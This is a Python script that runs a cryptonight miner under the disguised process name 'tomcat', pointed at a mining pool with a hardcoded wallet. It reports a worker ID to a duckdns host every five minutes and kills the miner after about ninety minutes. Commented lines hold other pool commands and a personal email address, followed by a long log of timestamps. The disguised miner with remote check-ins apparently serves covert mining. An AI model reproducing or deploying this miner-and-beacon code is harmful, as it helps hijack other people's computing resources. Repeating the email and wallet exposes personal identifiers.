import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:07.112013
#2018-02-17 16:14:07.347403
#2018-02-17 18:02:01.845574
#2018-02-17 19:49:07.263819
#2018-02-17 21:37:01.675488
#2018-02-17 23:21:01.662605
#2018-02-18 01:09:04.793597
#2018-02-18 02:57:05.404687
#2018-02-18 04:44:06.405368
#2018-02-18 06:36:01.553657
#2018-02-18 08:23:06.612446
#2018-02-18 10:11:04.671217
#2018-02-18 11:57:06.019339
#2018-02-18 13:42:01.973252
#2018-02-18 15:33:05.022703
#2018-02-18 17:21:07.468861
#2018-02-18 19:10:05.690000
#2018-02-18 20:56:05.205789
#2018-02-18 22:42:06.981165
#2018-02-19 00:31:01.512560
#2018-02-19 02:16:01.653736
#2018-02-19 04:03:03.675561
#2018-02-19 05:46:06.639616
#2018-02-19 07:36:05.788897
#2018-02-19 09:26:01.655961
#2018-02-19 11:15:09.990290
#2018-02-19 13:04:06.725423
#2018-02-19 14:52:01.656535
#2018-02-19 16:39:07.520268
#2018-02-19 18:26:01.301273
#2018-02-19 20:11:06.053194
#2018-02-19 22:02:03.999243
#2018-02-19 23:49:08.869057
#2018-02-20 01:36:05.760937
#2018-02-20 03:24:06.105915
#2018-02-20 05:12:07.387185
#2018-02-20 06:55:01.392571
#2018-02-20 08:42:07.276343
#2018-02-20 10:26:06.568387
#2018-02-20 12:11:04.311830
#2018-02-20 13:58:06.110405
#2018-02-20 15:42:09.096125
#2018-02-20 17:28:01.529823
#2018-02-20 19:17:07.134663
#2018-02-20 21:07:06.300838
#2018-02-20 22:58:01.565535
#2018-02-21 00:43:06.661221
#2018-02-21 02:29:07.537147
#2018-02-21 04:17:07.832318
#2018-02-21 06:04:04.042033
#2018-02-21 07:51:07.313952
#2018-02-21 09:38:06.858569
#2018-02-21 11:26:08.252701
#2018-02-21 13:16:01.914800
#2018-02-21 15:03:08.198589
#2018-02-21 16:53:01.531598
#2018-02-21 18:44:04.557562
#2018-02-21 20:36:08.147911
#2018-02-21 22:21:07.097201
#2018-02-22 00:11:07.542843
#2018-02-22 01:58:05.296126
#2018-02-22 03:46:06.276246
#2018-02-22 05:32:01.956024
#2018-02-22 07:17:04.013496
#2018-02-22 09:05:04.539191
#2018-02-22 10:53:07.547547
#2018-02-22 12:38:04.396916
#2018-02-22 14:24:04.399153
#2018-02-22 16:11:04.127046
#2018-02-22 17:57:09.546768
#2018-02-22 19:48:01.856278
#2018-02-22 21:38:05.540813
#2018-02-22 23:25:10.310067
#2018-02-23 01:13:06.675681
#2018-02-23 03:02:07.422240
#2018-02-23 04:49:05.765826
#2018-02-23 06:35:06.111379
#2018-02-23 08:23:01.976251
#2018-02-23 10:38:07.850736
#2018-02-23 12:34:05.138253
#2018-02-23 14:21:07.127664
#2018-02-23 16:13:10.925852
#2018-02-23 17:58:05.422542
#2018-02-23 19:45:06.054004
#2018-02-23 21:29:04.639017
#2018-02-23 23:18:06.619535
#2018-02-24 01:12:01.295248
#2018-02-24 03:02:05.975616
#2018-02-24 04:48:06.273252
#2018-02-24 06:33:07.429259
#2018-02-24 08:22:04.040424
#2018-02-24 10:05:07.649097
#2018-02-24 12:03:06.189269
#2018-02-24 13:51:05.452569
#2018-02-24 15:39:04.934503
#2018-02-24 17:33:07.025060
#2018-02-24 19:19:06.258764
#2018-02-24 21:10:01.902205
#2018-02-25 01:13:05.838891
#2018-02-25 05:03:06.156117
#2018-02-25 09:59:01.774411